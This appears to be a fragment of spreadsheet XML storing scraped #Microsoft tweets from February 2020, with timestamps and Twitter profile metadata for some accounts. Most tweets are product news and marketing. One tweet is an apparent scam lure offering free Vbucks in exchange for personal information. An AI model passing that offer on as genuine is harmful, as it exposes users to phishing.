    <t>#microsoft #cloud      86% of executives blame a lack of teamwork for team problems &amp;amp; failures.Check out this infographic for more on how #Teamworksolutions from Microsoft allow you to work with anyone, inside or outside your business. https://t.co/kKHTt6Wkjv</t>
  </si>
  <si>
    <t>Wed Feb 26 20:02:48 +0000 2020</t>
  </si>
  <si>
    <t>#AIIM20 attendees: Want to learn more about #Microsoft #ProjectCortex during the week? Attend this session led by Microsoft Project Cortex's Director of Product Development, @nmoneypenny, on Wednesday. More info on the blog: https://t.co/ULvMlUgu87 #mspartner https://t.co/nreSlVMOte</t>
  </si>
  <si>
    <t>Wed Feb 26 20:02:27 +0000 2020</t>
  </si>
  <si>
    <t>Get 13500 Vbucks for the Xbox One!
Enter your information now for a chance to win.
https://t.co/smEID78Tb1
#PS4 #XboxOne #iTunes #gaming #games #Microsoft #PlayStation #bttle #royale #fortnite #bucks #BattleRoyale #Fortnite https://t.co/NOdH3mFbGF</t>
  </si>
  <si>
    <t>{'id': 1220335311693107200, 'id_str': '1220335311693107200', 'name': 'Julie Cottle', 'screen_name': 'JulieCottle4', 'location': 'New York, USA', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 201, 'friends_count': 1377, 'listed_count': 0, 'created_at': 'Thu Jan 23 13:20:06 +0000 2020', 'favourites_count': 29, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False,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'http://pbs.twimg.com/profile_images/1220629499395506176/rnW4DLlh_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220629499395506176/rnW4DLlh_normal.jpg',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</si>
  <si>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20:02:03 +0000 2020</t>
  </si>
  <si>
    <t>Power BI APIs .NET SDK v3 has been released #powerbi #microsoft https://t.co/M4sUBKllky https://t.co/zPLXKhTyp3</t>
  </si>
  <si>
    <t>Wed Feb 26 20:02:02 +0000 2020</t>
  </si>
  <si>
    <t>#Ransomware attacks strike more often than you think, and new variations pop up constantly. Get data protection tips from this blog and contact Best Networks Inc for access to #Microsoft #Office365 advanced threat protection. https://t.co/9P4JapU0n9</t>
  </si>
  <si>
    <t>Wed Feb 26 20:01:32 +0000 2020</t>
  </si>
  <si>
    <t>Digitally Transform Your Enterprise with Power Automate: Our Journey to Enable Your Digital Transformation, Part 2 https://t.co/e8xs6y1vx8 #Microsoft #PowerAutomate #Flow</t>
  </si>
  <si>
    <t>Wed Feb 26 20:01:11 +0000 2020</t>
  </si>
  <si>
    <t>"We're about empowering people in organizations all over the world to achieve more. In today's world, we want to use AI to achieve that," says Microsoft CEO Satya Nadella. Learn about the #Microsoft vision. https://t.co/FyDMcRDYka</t>
  </si>
  <si>
    <t>{'id': 944208408709910528, 'id_str': '944208408709910528', 'name': 'exospec', 'screen_name': 'exospecus', 'location': 'Warren, OH', 'description': 'Managed Cloud, IT, Network, and Security Solutions', 'url': 'https://t.co/ns8TlL2vI7', 'entities': {'url': {'urls': [{'url': 'https://t.co/ns8TlL2vI7', 'expanded_url': 'http://www.exospec.us', 'display_url': 'exospec.us', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 19, 'friends_count': 66, 'listed_count': 0, 'created_at': 'Fri Dec 22 14:10:01 +0000 2017', 'favourites_count': 5, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 422,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'http://pbs.twimg.com/profile_images/944209145938436097/YTjJ_FJ__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/944209145938436097/YTjJ_FJ__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/944208408709910528/1515046007',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</si>
  <si>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20:00:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is committed to helping the #automotive industry take full advantage of technologies like #AI, #IoT, #blockchain and #quantumcomputing to enable new #mobility scenarios and immersive experiences. #CoolStuff https://t.co/FoUNckDB4k #MSFTAdvocate</t>
  </si>
  <si>
    <t>Wed Feb 26 19:59:02 +0000 2020</t>
  </si>
  <si>
    <t>Smart speakers mistakenly eavesdrop up to 19 times a day Amazon, Apple, #Google #MachineLearning #SmartHouse #Microsoft #Privacy  https://t.co/c8azeWbKQE https://t.co/coM0DfrdJc</t>
  </si>
  <si>
    <t>{'id': 291831562, 'id_str': '291831562', 'name': 'Paula Piccard ðŸ‡µðŸ‡· ðŸ‡ºðŸ‡¸', 'screen_name': 'Paula_Piccard', 'location': 'New York, USA', 'description': '#NewYork-er #WomeninTech #Cybersecurity Advocate â˜† #DigitalTransformation â˜† Social Media #Marketing â˜† #DigitalMarketing â˜†', 'url': 'https://t.co/LxiX2dqJGR', 'entities': {'url': {'urls': [{'url': 'https://t.co/LxiX2dqJGR', 'expanded_url': 'https://campsite.bio/paulapiccard', 'display_url': 'campsite.bio/paulapiccard', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 50899, 'friends_count': 9989, 'listed_count': 1378, 'created_at': 'Mon May 02 17:47:28 +0000 2011', 'favourites_count': 93022, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 95608, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'ADB0DE', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1007344781050048512/tThzjCI__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1007344781050048512/tThzjCI__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/291831562/1582050465', 'profile_link_color': '1D43DE',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</si>
  <si>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Feb 26 19:57:20 +0000 2020</t>
  </si>
  <si>
    <t>A new benchmark that has been leaked shows the next Microsoft Surface Book 3 convertible equipped with NVIDIA Max-Q graphics, and also with two different versions.
https://t.co/YRQgLFdOBZ
#SURFACE #Microsoft #technology #Nvidia</t>
  </si>
  <si>
    <t>{'id': 14146712, 'id_str': '14146712', 'name': 'GadgetMix #technology #lifestyle', 'screen_name': 'gadgetmix', 'location': 'New Delhi, India', 'description': 'Serving tech, lifestyle news since 2008. Featured on TechMeMe, Gizmodo, Engadget, Apple Insider and many more. GadgetMix = #Technology', 'url': 'https://t.co/axPTXoJR6V', 'entities': {'url': {'urls': [{'url': 'https://t.co/axPTXoJR6V', 'expanded_url': 'http://gadgetmix.com/', 'display_url': 'gadgetmix.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2764, 'friends_count': 3026, 'listed_count': 91, 'created_at': 'Fri Mar 14 13:49:09 +0000 2008', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 10491,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'http://pbs.twimg.com/profile_images/1047382478208598016/-dv_kU6C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1047382478208598016/-dv_kU6C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14146712/1538550536',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</si>
  <si>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19:55:52 +0000 2020</t>
  </si>
  <si>
    <t>These fools have outsourced blog contributions to criminals from #microsoft with their #proprietarysoftware trap, #github https://t.co/LxkIsuUtHA #deletegithub</t>
  </si>
  <si>
    <t>Wed Feb 26 19:53:50 +0000 2020</t>
  </si>
  <si>
    <t>We've started a video series sharing our insights and best practices about Microsoft's Cloud Adoption Framework for Azure and how we operationalize it. - Check it out and stay tuned! #azure #microsoft #cloudadoption #cspm
https://t.co/EwVAmCXf0E</t>
  </si>
  <si>
    <t>{'id': 712742340150960128, 'id_str': '712742340150960128', 'name': 'OpsCompass', 'screen_name': 'OpsCompass', 'location': 'Omaha, NE', 'description': 'OpsCompass makes it easy for enterprises to realize the full potential of their multi-cloud environments by providing the right information at the right time.', 'url': 'https://t.co/i4csirnkT2', 'entities': {'url': {'urls': [{'url': 'https://t.co/i4csirnkT2', 'expanded_url': 'http://opscompass.com', 'display_url': 'opscompass.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 96, 'friends_count': 15, 'listed_count': 2, 'created_at': 'Wed Mar 23 20:46:30 +0000 2016', 'favourites_count': 12, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 152,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'http://pbs.twimg.com/profile_images/1234520207517003778/kcWNtWLF_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1234520207517003778/kcWNtWLF_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/712742340150960128/1583167529', 'profile_link_color': '00AE9A',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</si>
  <si>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19:51:15 +0000 2020</t>
  </si>
  <si>
    <t>via #Citrix Blogs: "OSPF design and implementation on Citrix SD-WAN: " https://t.co/VW8ES6OuCP
.
.
.
#blog #virtualization #cloudcomputing #cloud #security #microsoft #azure #citrix #citrixishow</t>
  </si>
  <si>
    <t>Wed Feb 26 19:49:34 +0000 2020</t>
  </si>
  <si>
    <t>Great turn out at our Indianapolis "App In A Day".
#microsoft #powerapps https://t.co/Zs1QsbOKKU</t>
  </si>
  <si>
    <t>Wed Feb 26 19:45:12 +0000 2020</t>
  </si>
  <si>
    <t>A look inside Bill Gates management style... 
#microsoft #technology #startupenergy 
https://t.co/52cmtUzjoW</t>
  </si>
  <si>
    <t>Wed Feb 26 19:43:43 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Rolls Out the New Edge Browser to Windows 10 Users
https://t.co/XRpPfB5uwh https://t.co/EKFiq2vDl7</t>
  </si>
  <si>
    <t>Wed Feb 26 19:43:24 +0000 2020</t>
  </si>
  <si>
    <t>Creating a Windows 10 image using WDS/MDT for network deployment. 
The goal was to create a Windows 10 build 1909 image customized with software to deploy over the network using a WDS server.
#systemadmin #windowsserver #windows #windows10 #microsoft 
https://t.co/BPtAKgkNih</t>
  </si>
  <si>
    <t>{'id': 86732997, 'id_str': '86732997', 'name': 'Edino', 'screen_name': 'landin0', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 191, 'friends_count': 998, 'listed_count': 0, 'created_at': 'Sun Nov 01 14:39:15 +0000 2009', 'favourites_count': 1885, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3012,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'http://pbs.twimg.com/profile_images/984920195/PIC_10-06-12_22-43-13_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/984920195/PIC_10-06-12_22-43-13_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/86732997/1437564202', 'profile_link_color': '000000', 'profile_sidebar_border_color': '323F57', 'profile_sidebar_fill_color': '000000', 'profile_text_color': 'FFFFFF', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 19:43:06 +0000 2020</t>
  </si>
  <si>
    <t>Are you using this feature in #Microsoft Teams? https://t.co/kSfnLV23p9 #productivity</t>
  </si>
  <si>
    <t>Wed Feb 26 19:42:37 +0000 2020</t>
  </si>
  <si>
    <t>Top 10 #investments that individual (non-accredited) investors can make in #quantumcomputing 
#Google #IBM #Microsoft #Alibaba #Intel #Baidu
 https://t.co/zJA1pp0KSy</t>
  </si>
  <si>
    <t>{'id': 909795881964142592, 'id_str': '909795881964142592', 'name': 'Eye Capital', 'screen_name': 'EyeCapital', 'location': '', 'description': 'The AI Quant Partner for Banks, Asset Management &amp; Hedge Funds', 'url': 'https://t.co/zdDGbgsKYC', 'entities': {'url': {'urls': [{'url': 'https://t.co/zdDGbgsKYC', 'expanded_url': 'http://www.eye-capital.com', 'display_url': 'eye-capital.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 282, 'friends_count': 29, 'listed_count': 3, 'created_at': 'Mon Sep 18 15:06:56 +0000 2017', 'favourites_count': 76, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 153,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'http://pbs.twimg.com/profile_images/972099774022406144/cWlc2J57_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/972099774022406144/cWlc2J57_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/909795881964142592/1583093120',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</si>
  <si>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19:37:50 +0000 2020</t>
  </si>
  <si>
    <t>How to Reset Your #Windows PIN If You Forget It. #Microsoft #Tips  https://t.co/Vz8IzHdyXo</t>
  </si>
  <si>
    <t>Wed Feb 26 19:35:02 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Edge Preview Build v81 With New Toolchain Optimizations Tested On Windows 10 Promises Performance Boost
https://t.co/yZ4ActFhLa
#news #video #tech #chromium #edge #microsoft #news #software #uncategorized #windows 
https://t.co/yZ4ActFhLa</t>
  </si>
  <si>
    <t>Wed Feb 26 19:33:11 +0000 2020</t>
  </si>
  <si>
    <t>#ONA ATL and #Microsoft News Labs take a deep dive into the present and future state of #AI and discuss how it affects our everyday lives and the way we do our jobs.
https://t.co/bc6IZTUowH</t>
  </si>
  <si>
    <t>{'id': 717398623475134464, 'id_str': '717398623475134464', 'name': 'Daniel Pimentel', 'screen_name': 'xrprof', 'location': '', 'description': 'PhD candidate at the University of Florida ðŸŠ. Media FX. Immersive conservation storytelling ðŸ¢. Coffee black â˜•. Final Fantasy zealot ðŸ—¡ï¸.', 'url': 'https://t.co/OmwnpvqCFT', 'entities': {'url': {'urls': [{'url': 'https://t.co/OmwnpvqCFT', 'expanded_url': 'http://danpimentel.com', 'display_url': 'danpimentel.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 181, 'friends_count': 477, 'listed_count': 7, 'created_at': 'Tue Apr 05 17:08:55 +0000 2016', 'favourites_count': 868, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 510,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'http://pbs.twimg.com/profile_images/823176075236835328/7NYm3Zd2_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/823176075236835328/7NYm3Zd2_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/717398623475134464/1582746749',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</si>
  <si>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19:32:57 +0000 2020</t>
  </si>
  <si>
    <t>Geek squad refund scammers - 845-681-4060 - #Scammer #Scambait #TSU #Refund #Scam #Info #Information #Windows #Microsoft - https://t.co/cqiVMnKzEq</t>
  </si>
  <si>
    <t>Wed Feb 26 19:31:55 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Microsoft Rolls Out the New Edge Browser to Windows 10 Users:" https://t.co/3wT2iGBCiI
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Wed Feb 26 19:30:33 +0000 2020</t>
  </si>
  <si>
    <t>Database DevOps: 3 options for #SQLServer on #Kubernetes
https://t.co/zeYRaokBAu
#docker #Cloud #Linux #Azure #microsoft #madeiradata https://t.co/6De5dnNpMJ</t>
  </si>
  <si>
    <t>Wed Feb 26 19:30:01 +0000 2020</t>
  </si>
  <si>
    <t>I feel so honored. Two Microsoft employees have been included in Marktechposts Top Artificial Intelligence Influencers To Follow in 2020 list. Congratulations, @nigewillson! #Microsoft #AI #Artificial #Intelligence https://t.co/H96txbbLpW</t>
  </si>
  <si>
    <t>Wed Feb 26 19:25:20 +0000 2020</t>
  </si>
  <si>
    <t>How to future-proof your IT career in the age of AI https://t.co/INblZGZxAv via @HYBRID_CIRCLE #Cloud #Microsoft https://t.co/D3NSLTK29O</t>
  </si>
  <si>
    <t>Wed Feb 26 19:24:14 +0000 2020</t>
  </si>
  <si>
    <t>#Simplify and #automate your process of transferring regular #payments to multiple vendors with the new ODT Electronic Funds Transfer 365 add-on for #Dyn365 #BusinessCentral. Find it on #Microsoft's #AppSource now &amp;amp; learn more in our blog here: https://t.co/lfMCATxk4g https://t.co/g5VJmifY9S</t>
  </si>
  <si>
    <t>{'id': 211251103, 'id_str': '211251103', 'name': 'Open Door Technology', 'screen_name': 'opendoorerp', 'location': 'Calgary, Alberta, Canada', 'description': 'Microsoft Gold ERP Partner specializing in delivering creative solutions built on Microsoft Dynamics NAV, Dynamics CRM, and Open Door Rental Software.', 'url': 'http://t.co/gLB9RJuyje', 'entities': {'url': {'urls': [{'url': 'http://t.co/gLB9RJuyje', 'expanded_url': 'http://www.opendoorerp.com', 'display_url': 'opendoorerp.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 156, 'friends_count': 125, 'listed_count': 14, 'created_at': 'Tue Nov 02 18:57:57 +0000 2010', 'favourites_count': 11, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 825, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '3E72AD', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/378800000543255579/6aa15a7c7dbc77e550d58bb5f9f2f4d7_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000543255579/6aa15a7c7dbc77e550d58bb5f9f2f4d7_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/211251103/1380818172', 'profile_link_color': '009999', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'E1EBFA', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 19:21:57 +0000 2020</t>
  </si>
  <si>
    <t>Theres just NO WAY  #Nintendo doesn't have some hardware cooking to compete with #Sony and #Microsoft. 
Excited for the next generation of video games</t>
  </si>
  <si>
    <t>{'id': 1162777781287055362, 'id_str': '1162777781287055362', 'name': 'Dextereddie', 'screen_name': 'Dextereddiee', 'location': '', 'description': 'waking baking and playing', 'url': 'https://t.co/PVQJROTksv', 'entities': {'url': {'urls': [{'url': 'https://t.co/PVQJROTksv', 'expanded_url': 'http://twitch.tv/dextereddie', 'display_url': 'twitch.tv/dextereddie', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 868, 'friends_count': 1565, 'listed_count': 3, 'created_at': 'Sat Aug 17 17:27:02 +0000 2019', 'favourites_count': 1078, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1387, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1162778154638798849/Z1L0oIqS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1162778154638798849/Z1L0oIqS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1162777781287055362/1580596957',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</si>
  <si>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19:21:56 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft invested over $1 billion into developing top-notch security for their cloud so you don't have to. Run your server and store your data with confidence on #Azure. https://t.co/8cYm46Q5OK</t>
  </si>
  <si>
    <t>{'id': 71539109, 'id_str': '71539109', 'name': 'PointClick Technologies', 'screen_name': 'pointclicktech', 'location': 'Raleigh, NC', 'description': 'Managed Cloud Services provider serving SMB and Enterprise Customers worldwide. HQ in Raleigh, NC with offices in Malaga, Spain  Jaipur, India  Banjul, Gambia', 'url': 'http://t.co/zDQS4O5yWK', 'entities': {'url': {'urls': [{'url': 'http://t.co/zDQS4O5yWK', 'expanded_url': 'http://www.pointclick.net', 'display_url': 'pointclick.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 463, 'friends_count': 434, 'listed_count': 109, 'created_at': 'Fri Sep 04 13:51:17 +0000 2009', 'favourites_count': 21, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1578,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'http://pbs.twimg.com/profile_images/1219300044974776320/_q1F-AMj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1219300044974776320/_q1F-AMj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/71539109/1517343776', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'BDDCAD', 'profile_sidebar_fill_color': 'DDFFCC', 'profile_text_color': '333333', 'profile_use_background_image': False, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>#Microsoft invested over $1 billion into developing top-notch security for their cloud so you don't have to. Run your server and store your data with confidence on #Azure. https://t.co/H5x3uMJoLo</t>
  </si>
  <si>
    <t>{'id': 940677303121711104, 'id_str': '940677303121711104', 'name': 'Ousman Manneh', 'screen_name': 'paousmanmanneh', 'location': 'Raleigh, NC', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 148, 'friends_count': 599, 'listed_count': 2, 'created_at': 'Tue Dec 12 20:18:40 +0000 2017', 'favourites_count': 100, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 644, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1168662035997085697/DSM8Pjug_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168662035997085697/DSM8Pjug_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/940677303121711104/1513785693',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</si>
  <si>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19:21:48 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/i1wdU7RUnc</t>
  </si>
  <si>
    <t>Wed Feb 26 19:20:20 +0000 2020</t>
  </si>
  <si>
    <t>A visual history of the many Xbox dashboards https://t.co/QAjGWabDdT #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 19:19:24 +0000 2020</t>
  </si>
  <si>
    <t>Producing 500+ videos for IGEL Technology over the years has transformed our initial business partnership into a long-term friendship.
https://t.co/nTstHvc6fL
#technology #testimonial #corporatevideos #videoproduction #citrix #vmware #amazon #microsoft  #interview  #video https://t.co/ks7YWXDMng</t>
  </si>
  <si>
    <t>{'id': 920653322700443649, 'id_str': '920653322700443649', 'name': 'Vibrant Media Productions, LLC', 'screen_name': 'VIBRANTMEDIAPRO', 'location': 'Orlando, FL', 'description': 'Vibrant Media Productions is a client-focused and results-oriented full-service video production company based in Orlando, FL.', 'url': 'https://t.co/9HD1YvPAEZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/9HD1YvPAEZ', 'expanded_url': 'https://vibrantmediaproductions.com/', 'display_url': 'vibrantmediaproductions.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 44, 'listed_count': 0, 'created_at': 'Wed Oct 18 14:10:31 +0000 2017', 'favourites_count': 98, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 154,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'http://pbs.twimg.com/profile_images/920655074816339968/WDUAvxi8_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/920655074816339968/WDUAvxi8_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/920653322700443649/1508336524',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</si>
  <si>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19:18:56 +0000 2020</t>
  </si>
  <si>
    <t>If you missed our recent presentation on Digital Transformation for #Microsoft #DynamicsNAV and #Dynamics365BusinessCentral, you can still watch the recording! 
https://t.co/aOSEWgoLlv #MSDyn365BC #ERP #EDIMadeSimple #EDI https://t.co/sPEXP6V7Aj</t>
  </si>
  <si>
    <t>Wed Feb 26 19:17:01 +0000 2020</t>
  </si>
  <si>
    <t>https://t.co/M3rauRlO9e LIVE NOW!! Come and join me and boys and girls on minecraft, hopefully defeating the wither again tonight!! #SupportSmallStreamers #twitchtv #twitchstreamer #PartTimePrimeMinister #party #youtube #twitch #twitchaffiliate #fun #minecraft #PS4 #microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 19:15:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft rolling out its new #Chromium-based #Edge via #Windows10 Insider update https://t.co/GnFmH7JqJm via @NexusBen</t>
  </si>
  <si>
    <t>Wed Feb 26 19:14:57 +0000 2020</t>
  </si>
  <si>
    <t>Looking for a quick lunch-time read? Im sharing #Microsofts three-pronged approach to positive #leadership in this weeks PRINCIPLES article!
If you arent already, follow along on LinkedIn for #PRINCIPLES reveals on Monday! #MSpartner https://t.co/vcZHBPMqtI https://t.co/LoVgURk4dg</t>
  </si>
  <si>
    <t>{'id': 3305263902, 'id_str': '3305263902', 'name': 'Gavriella Schuster', 'screen_name': 'gavriels1', 'location': 'Redmond, WA', 'description': 'Passionate about partners! Making Microsoft a great company to do business with!', 'url': 'https://t.co/OJMgFA4nED', 'entities': {'url': {'urls': [{'url': 'https://t.co/OJMgFA4nED', 'expanded_url': 'http://partner.microsoft.com', 'display_url': 'partner.microsoft.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6016, 'friends_count': 417, 'listed_count': 145, 'created_at': 'Mon Aug 03 16:30:31 +0000 2015', 'favourites_count': 176, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1299,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'http://pbs.twimg.com/profile_images/884446033685618690/3R_w2Mr7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/884446033685618690/3R_w2Mr7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3305263902/1501712499',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</si>
  <si>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19:14:54 +0000 2020</t>
  </si>
  <si>
    <t>For #SMBs, moving to the #cloud is proven to help achieve greater profit margins and ROI. Check out this informative infographic to see why it's a game changer.      #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/TgNrkrOF4b</t>
  </si>
  <si>
    <t>Wed Feb 26 19:12:38 +0000 2020</t>
  </si>
  <si>
    <t>The #Microsoft Puget Sound campus consists of 120 buildings and 15 million square feet of office space. Operating that much infrastructure is a huge undertaking and requires serious IT solutions. How are you managing your operations? https://t.co/J4uHcRig7r</t>
  </si>
  <si>
    <t>Wed Feb 26 19:12:00 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft last week launched Office, a new mobile app for iOS and Android that the #company slid into an already packed line-up of #individual apps, learn how-https://t.co/T8ne86x0CN</t>
  </si>
  <si>
    <t>{'id': 93903118, 'id_str': '93903118', 'name': 'Reliable Software', 'screen_name': 'rsrit', 'location': 'Northville, MI', 'description': 'Reliable Software provides solutions in: #DataScience, #Analytics, #Cloud, #DevOps, and #BigData.', 'url': 'https://t.co/4wXxjKUqhL', 'entities': {'url': {'urls': [{'url': 'https://t.co/4wXxjKUqhL', 'expanded_url': 'http://www.rsrit.com', 'display_url': 'rsrit.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 628, 'friends_count': 875, 'listed_count': 105, 'created_at': 'Tue Dec 01 17:31:25 +0000 2009', 'favourites_count': 941, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3674,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'http://pbs.twimg.com/profile_images/895624169680809984/V9Vc8pDo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/895624169680809984/V9Vc8pDo_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/93903118/1528468224', 'profile_link_color': '00ACBB',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</si>
  <si>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19:11:00 +0000 2020</t>
  </si>
  <si>
    <t>@NintendoAmerica @Minecraft @MojangSupport You SHOULD NOT force people to pay a fee to "go online" to connect with other Minecraft players when they are clearly on their own local area network. ARE YOU LISTENING? AT ALL? 
#WednesdayThoughts #gaming #minecraft #nintendo #xbox #microsoft</t>
  </si>
  <si>
    <t>{'id': 20474222, 'id_str': '20474222', 'name': 'pcberdwin', 'screen_name': 'pcberdwin', 'location': 'Provo, UT, US', 'description': 'Likes artsy stuff and daydreams too much.', 'url': 'https://t.co/LSIGvH9a7R', 'entities': {'url': {'urls': [{'url': 'https://t.co/LSIGvH9a7R', 'expanded_url': 'http://pcberdwin.com', 'display_url': 'pcberdwin.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 73, 'listed_count': 19, 'created_at': 'Mon Feb 09 22:36:03 +0000 2009', 'favourites_count': 2213, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4521,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'http://pbs.twimg.com/profile_images/979472350046404608/USAEOCSQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/979472350046404608/USAEOCSQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20474222/1567188165', 'profile_link_color': '779995',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</si>
  <si>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Wed Feb 26 19:10:40 +0000 2020</t>
  </si>
  <si>
    <t>If you missed our recent presentation on Digital Transformation for #Microsoft #DynamicsNAV and #Dynamics365BusinessCentral, you can still watch the recording! 
https://t.co/ViZbzMzo2m #MSDyn365BC #ERP #EDIMadeSimple #EDI https://t.co/uwQ4hfuVAp</t>
  </si>
  <si>
